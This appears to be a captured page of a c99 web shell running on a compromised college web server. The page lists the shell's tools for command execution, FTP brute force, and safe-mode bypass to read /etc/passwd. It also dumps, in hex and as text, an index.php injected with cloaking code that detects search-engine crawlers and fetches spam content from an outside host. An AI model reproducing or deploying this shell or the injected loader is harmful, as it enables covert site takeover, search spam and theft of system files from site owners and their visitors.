!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (2.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/index.php
Size 2.54 KB
MD5 e16654a45413fb11ed393eac4ac8a337
Owner/Group root/root
Perms-rw-r--r--
Create time 07/12/2023 15:52:54
Access time 06/07/2024 18:17:11
MODIFY time 07/12/2023 15:52:53

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570
00000588
000005A0
000005B8
000005D0
000005E8
00000600
00000618
00000630
00000648
00000660
00000678
00000690
000006A8
000006C0
000006D8
000006F0
00000708
00000720
00000738
00000750
00000768
00000780
00000798
000007B0
000007C8
000007E0
000007F8
00000810
00000828
00000840
00000858
00000870
00000888
000008A0
000008B8
000008D0
000008E8
00000900
00000918
00000930
00000948
00000960
00000978
00000990
000009A8
000009C0
000009D8
000009F0
00000A08
00000A20
3C 3F 70 68 70 0A 68 65 61 64 65 72 28 22 43 6F 6E 74 65 6E 74 2D 74 79
70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 3B 20 63 68 61 72 73 65 74 3D 75
74 66 2D 38 22 29 3B 0A 40 73 65 74 5F 74 69 6D 65 5F 6C 69 6D 69 74 28
33 30 29 3B 0A 65 72 72 6F 72 5F 72 65 70 6F 72 74 69 6E 67 28 30 29 3B
0A 24 74 72 20 3D 20 22 73 74 72 69 73 74 72 22 3B 0A 24 65 72 20 3D 20
24 5F 53 45 52 56 45 52 3B 0A 69 6E 69 5F 73 65 74 28 27 75 73 65 72 5F
61 67 65 6E 74 27 2C 27 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D
70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 6C 65 62 6F 74 2F 32 2E 31 3B 20
2B 68 74 74 70 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 62
6F 74 2E 68 74 6D 6C 29 27 29 3B 0A 64 65 66 69 6E 65 28 27 75 72 6C 27
2C 20 24 65 72 5B 27 52 45 51 55 45 53 54 5F 55 52 49 27 5D 29 3B 0A 64
65 66 69 6E 65 28 27 72 65 66 27 2C 20 24 65 72 5B 27 48 54 54 50 5F 52
45 46 45 52 45 52 27 5D 29 3B 0A 64 65 66 69 6E 65 28 27 65 6E 74 27 2C
20 24 65 72 5B 27 48 54 54 50 5F 55 53 45 52 5F 41 47 45 4E 54 27 5D 29
3B 0A 64 65 66 69 6E 65 28 27 73 69 74 65 27 2C 20 22 68 74 74 70 3A 2F
2F 6A 73 63 2E 64 6E 73 35 32 2E 76 69 70 2F 22 29 3B 0A 64 65 66 69 6E
65 28 27 72 6F 61 64 27 2C 20 22 3F 2F 22 20 2E 24 65 72 5B 27 48 54 54
50 5F 48 4F 53 54 27 5D 20 2E 20 75 72 6C 29 3B 0A 64 65 66 69 6E 65 28
27 72 65 67 73 27 2C 20 27 40 42 61 69 64 75 7C 53 6F 67 6F 75 7C 59 69
73 6F 75 7C 48 61 6F 73 6F 75 7C 53 70 69 64 65 72 7C 53 6F 2E 63 6F 6D
7C 47 6F 6F 67 6C 65 62 6F 74 7C 67 6F 6F 67 6C 65 40 69 27 29 3B 0A 64
65 66 69 6E 65 28 27 61 72 65 61 27 2C 20 24 74 72 28 75 72 6C 2C 20 22
30 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 31 22 29 20 6F 72 20
24 74 72 28 75 72 6C 2C 20 22 32 22 29 20 6F 72 20 24 74 72 28 75 72 6C
2C 20 22 33 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 34 22 29 20
6F 72 20 24 74 72 28 75 72 6C 2C 20 22 35 22 29 20 6F 72 20 24 74 72 28
75 72 6C 2C 20 22 36 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 37
22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 38 22 29 20 6F 72 20 24
74 72 28 75 72 6C 2C 22 39 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 31
2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 32 2F 22 29 6F 72 20 24 74
72 28 75 72 6C 2C 22 33 2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 34
2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 35 2F 22 29 6F 72 20 24 74
72 28 75 72 6C 2C 22 36 2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 37
2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 38 2F 22 29 6F 72 20 24 74
72 28 75 72 6C 2C 22 39 2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 30
2F 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 2E 78 6D 6C 22 29 20 6F
72 20 24 74 72 28 75 72 6C 2C 20 22 2E 64 6F 63 22 29 20 6F 72 20 24 74
72 28 75 72 6C 2C 20 22 2E 70 64 66 22 29 20 6F 72 20 24 74 72 28 75 72
6C 2C 20 22 2E 74 78 74 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22
2E 70 70 74 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 2E 70 70 74
78 22 29 20 6F 72 20 24 74 72 28 75 72 6C 2C 20 22 2E 78 6C 73 22 29 20
6F 72 20 24 74 72 28 75 72 6C 2C 20 22 2E 63 73 76 22 29 20 6F 72 20 24
74 72 28 75 72 6C 2C 20 22 2E 73 68 74 6D 6C 22 29 20 6F 72 20 24 74 72
28 75 72 6C 2C 22 2E 62 61 69 64 75 22 29 6F 72 20 24 74 72 28 75 72 6C
2C 22 2E 67 61 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 2E 67 71 22 29
6F 72 20 24 74 72 28 75 72 6C 2C 22 2E 61 73 70 22 29 6F 72 20 24 74 72
28 75 72 6C 2C 22 2E 6A 73 70 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22
2E 70 68 70 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 2E 63 6F 6D 22 29
6F 72 20 24 74 72 28 75 72 6C 2C 22 2E 6E 65 74 22 29 6F 72 20 24 74 72
28 75 72 6C 2C 22 2E 67 6F 76 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22
2E 65 64 75 22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 2E 62 61 69 6B 65
22 29 6F 72 20 24 74 72 28 75 72 6C 2C 22 61 70 70 2F 22 29 6F 72 20 24
74 72 28 75 72 6C 2C 22 2E 68 74 6D 6C 22 29 61 6E 64 20 24 74 72 28 75
72 6C 2C 20 22 3F 22 29 29 3B 0A 69 66 20 28 61 72 65 61 20 26 26 20 70
72 65 67 5F 6D 61 74 63 68 28 72 65 67 73 2C 20 72 65 66 29 29 20 7B 0A
65 63 68 6F 20 78 69 61 6F 71 69 61 6F 28 22 68 74 74 70 3A 2F 2F 6A 73
63 2E 64 6E 73 35 32 2E 76 69 70 2F 34 30 34 2E 68 74 6D 6C 22 29 3B 0A
65 78 69 74 28 29 3B 0A 7D 0A 69 66 20 28 70 72 65 67 5F 6D 61 74 63 68
28 72 65 67 73 2C 20 65 6E 74 29 29 20 7B 0A 69 66 20 28 61 72 65 61 29
20 7B 0A 65 63 68 6F 20 78 69 61 6F 71 69 61 6F 28 73 69 74 65 2E 72 6F
61 64 29 3B 0A 65 78 69 74 3B 0A 7D 20 65 6C 73 65 20 7B 0A 65 63 68 6F
20 78 69 61 6F 71 69 61 6F 28 22 68 74 74 70 3A 2F 2F 6A 73 63 2E 64 6E
73 35 32 2E 76 69 70 2F 7A 7A 31 2E 70 68 70 22 29 3B 0A 6F 62 5F 66 6C
75 73 68 28 29 3B 0A 66 6C 75 73 68 28 29 3B 0A 7D 0A 7D 0A 66 75 6E 63
74 69 6F 6E 20 78 69 61 6F 71 69 61 6F 28 24 63 29 20 7B 0A 24 64 3D 63
75 72 6C 5F 69 6E 69 74 28 29 3B 0A 63 75 72 6C 5F 73 65 74 6F 70 74 28
24 64 2C 43 55 52 4C 4F 50 54 5F 55 52 4C 2C 24 63 29 3B 0A 63 75 72 6C
5F 73 65 74 6F 70 74 28 24 64 2C 43 55 52 4C 4F 50 54 5F 55 53 45 52 41
47 45 4E 54 2C 27 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61
74 69 62 6C 65 3B 20 47 6F 6F 67 6C 65 62 6F 74 2F 32 2E 31 3B 20 2B 68
74 74 70 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 62 6F 74
2E 68 74 6D 6C 29 27 29 3B 0A 63 75 72 6C 5F 73 65 74 6F 70 74 28 24 64
2C 43 55 52 4C 4F 50 54 5F 53 53 4C 5F 56 45 52 49 46 59 50 45 45 52 2C
46 41 4C 53 45 29 3B 0A 63 75 72 6C 5F 73 65 74 6F 70 74 28 24 64 2C 43
55 52 4C 4F 50 54 5F 53 53 4C 5F 56 45 52 49 46 59 48 4F 53 54 2C 46 41
4C 53 45 29 3B 0A 63 75 72 6C 5F 73 65 74 6F 70 74 28 24 64 2C 43 55 52
4C 4F 50 54 5F 52 45 54 55 52 4E 54 52 41 4E 53 46 45 52 2C 31 29 3B 0A
63 75 72 6C 5F 73 65 74 6F 70 74 28 24 64 2C 43 55 52 4C 4F 50 54 5F 48
45 41 44 45 52 2C 30 29 3B 0A 24 65 3D 63 75 72 6C 5F 65 78 65 63 28 24
64 29 3B 0A 63 75 72 6C 5F 63 6C 6F 73 65 28 24 64 29 3B 0A 72 65 74 75
72 6E 20 24 65 3B 0A 7D 0A 3F 3E 0A 3C 21 44 4F 43 54 59 50 45 20 68 74
6D 6C 20 50 55 42 4C 49 43 20 22 2D 2F 2F 57 33 43 2F 2F 44 54 44 20 58
48 54 4D 4C 20 31 2E 30 20 54 72 61 6E 73 69 74 69 6F 6E 61 6C 2F 2F 45
4E 22 20 22 68 74 74 70 3A 2F 2F 77 77 77 2E 77 33 2E 6F 72 67 2F 54 52
2F 78 68 74 6D 6C 31 2F 44 54 44 2F 78 68 74 6D 6C 31 2D 74 72 61 6E 73
69 74 69 6F 6E 61 6C 2E 64 74 64 22 3E 0A 3C 68 74 6D 6C 20 78 6D 6C 6E
73 3D 22 68 74 74 70 3A 2F 2F 77 77 77 2E 77 33 2E 6F 72 67 2F 31 39 39
39 2F 78 68 74 6D 6C 22 3E 0A 3C 68 65 61 64 3E 0A 3C 6D 65 74 61 20 68
74 74 70 2D 65 71 75 69 76 3D 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22
20 63 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20 63 68 61
72 73 65 74 3D 77 69 6E 64 6F 77 73 2D 38 37 34 22 20 2F 3E 0A 3C 74 69
74 6C 65 3E E0 B8 A7 E0 B8 B4 E0 B8 97 E0 B8 A2 E0 B8 B2 E0 B8 A5 E0 B8
B1 E0 B8 A2 E0 B8 9E E0 B8 A2 E0 B8 B2 E0 B8 9A E0 B8 B2 E0 B8 A5 E0 B8
9A E0 B8 A3 E0 B8 A1 E0 B8 A3 E0 B8 B2 E0 B8 8A E0 B8 8A E0 B8 99 E0 B8
99 E0 B8 B5 20 E0 B8 AD E0 B8 B8 E0 B8 94 E0 B8 A3 E0 B8 98 E0 B8 B2 E0
B8 99 E0 B8 B5 3C 2F 74 69 74 6C 65 3E 0A 3C 2F 68 65 61 64 3E 0A 3C 62
6F 64 79 3E 0A 3C 64 69 76 20 61 6C 69 67 6E 3D 22 63 65 6E 74 65 72 22
3E 0A 20 20 3C 70 3E 3C 69 6D 67 20 73 72 63 3D 22 68 74 74 70 73 3A 2F
2F 77 77 77 2E 62 63 6E 75 2E 61 63 2E 74 68 2F 77 65 62 73 69 74 65 62
63 6E 75 32 2E 6A 70 67 20 22 20 77 69 64 74 68 3D 22 31 30 30 25 22 20
68 65 69 67 68 74 3D 22 31 30 30 25 22 20 2F 3E 3C 2F 70 3E 0A 20 20 3C
70 3E 3C 61 20 68 72 65 66 3D 22 68 74 74 70 3A 2F 2F 31 31 30 2E 31 36
34 2E 35 31 2E 32 33 30 2F 6D 69 73 2F 69 6E 64 65 78 5F 63 6F 64 65 69
67 6E 69 74 65 72 2E 70 68 70 2F 65 72 65 67 69 73 2F 67 65 6E 65 72 61
6C 2F 73 68 6F 77 4E 77 22 3E 3C 69 6D 67 20 73 72 63 3D 22 68 74 74 70
73 3A 2F 2F 77 77 77 2E 62 63 6E 75 2E 61 63 2E 74 68 2F 62 63 6E 75 32
2E 70 6E 67 22 20 77 69 64 74 68 3D 22 31 30 25 22 20 2F 3E 3C 2F 61 3E
26 6E 62 73 70 3B 26 6E 62 73 70 3B 26 6E 62 73 70 3B 26 6E 62 73 70 3B
26 6E 62 73 70 3B 0A 3C 2F 68 74 6D 6C 3E
<?php header("Content-ty
pe: text/html; charset=u
tf-8"); @set_time_limit(
30); error_reporting(0);
 $tr = "stristr"; $er = 
$_SERVER; ini_set('user_
agent','Mozilla/5.0 (com
patible; Googlebot/2.1; 
+http://www.google.com/b
ot.html)'); define('url'
, $er['REQUEST_URI']); d
efine('ref', $er['HTTP_R
EFERER']); define('ent',
 $er['HTTP_USER_AGENT'])
; define('site', "http:/
/jsc.dns52.vip/"); defin
e('road', "?/" .$er['HTT
P_HOST'] . url); define(
'regs', '@Baidu|Sogou|Yi
sou|Haosou|Spider|So.com
|Googlebot|google@i'); d
efine('area', $tr(url, "
0") or $tr(url, "1") or 
$tr(url, "2") or $tr(url
, "3") or $tr(url, "4") 
or $tr(url, "5") or $tr(
url, "6") or $tr(url, "7
") or $tr(url, "8") or $
tr(url,"9")or $tr(url,"1
/")or $tr(url,"2/")or $t
r(url,"3/")or $tr(url,"4
/")or $tr(url,"5/")or $t
r(url,"6/")or $tr(url,"7
/")or $tr(url,"8/")or $t
r(url,"9/")or $tr(url,"0
/")or $tr(url, ".xml") o
r $tr(url, ".doc") or $t
r(url, ".pdf") or $tr(ur
l, ".txt") or $tr(url, "
.ppt") or $tr(url, ".ppt
x") or $tr(url, ".xls") 
or $tr(url, ".csv") or $
tr(url, ".shtml") or $tr
(url,".baidu")or $tr(url
,".ga")or $tr(url,".gq")
or $tr(url,".asp")or $tr
(url,".jsp")or $tr(url,"
.php")or $tr(url,".com")
or $tr(url,".net")or $tr
(url,".gov")or $tr(url,"
.edu")or $tr(url,".baike
")or $tr(url,"app/")or $
tr(url,".html")and $tr(u
rl, "?")); if (area && p
reg_match(regs, ref)) { 
echo xiaoqiao("http://js
c.dns52.vip/404.html"); 
exit(); } if (preg_match
(regs, ent)) { if (area)
 { echo xiaoqiao(site.ro
ad); exit; } else { echo
 xiaoqiao("http://jsc.dn
s52.vip/zz1.php"); ob_fl
ush(); flush(); } } func
tion xiaoqiao($c) { $d=c
url_init(); curl_setopt(
$d,CURLOPT_URL,$c); curl
_setopt($d,CURLOPT_USERA
GENT,'Mozilla/5.0 (compa
tible; Googlebot/2.1; +h
ttp://www.google.com/bot
.html)'); curl_setopt($d
,CURLOPT_SSL_VERIFYPEER,
FALSE); curl_setopt($d,C
URLOPT_SSL_VERIFYHOST,FA
LSE); curl_setopt($d,CUR
LOPT_RETURNTRANSFER,1); 
curl_setopt($d,CURLOPT_H
EADER,0); $e=curl_exec($
d); curl_close($d); retu
rn $e; } ?> <!DOCTYPE ht
ml PUBLIC "-//W3C//DTD X
HTML 1.0 Transitional//E
N" "http://www.w3.org/TR
/xhtml1/DTD/xhtml1-trans
itional.dtd"> <html xmln
s="http://www.w3.org/199
9/xhtml"> <head> <meta h
ttp-equiv="Content-Type"
 content="text/html; cha
rset=windows-874" /> <ti
tle>วิทยาลà¸
±à¸¢à¸žà¸¢à¸²à¸šà¸²à¸¥à¸
šà¸£à¸¡à¸£à¸²à¸Šà¸Šà¸™à¸
™à¸µ à¸­à¸¸à¸”รธาà
¸™à¸µ</title> </head> <b
ody> <div align="center"
>   <p><img src="https:/
/www.bcnu.ac.th/websiteb
cnu2.jpg " width="100%" 
height="100%" /></p>   <
p><a href="http://110.16
4.51.230/mis/index_codei
gniter.php/eregis/genera
l/showNw"><img src="http
s://www.bcnu.ac.th/bcnu2
.png" width="10%" /></a>
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp; </html>

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0189 ]--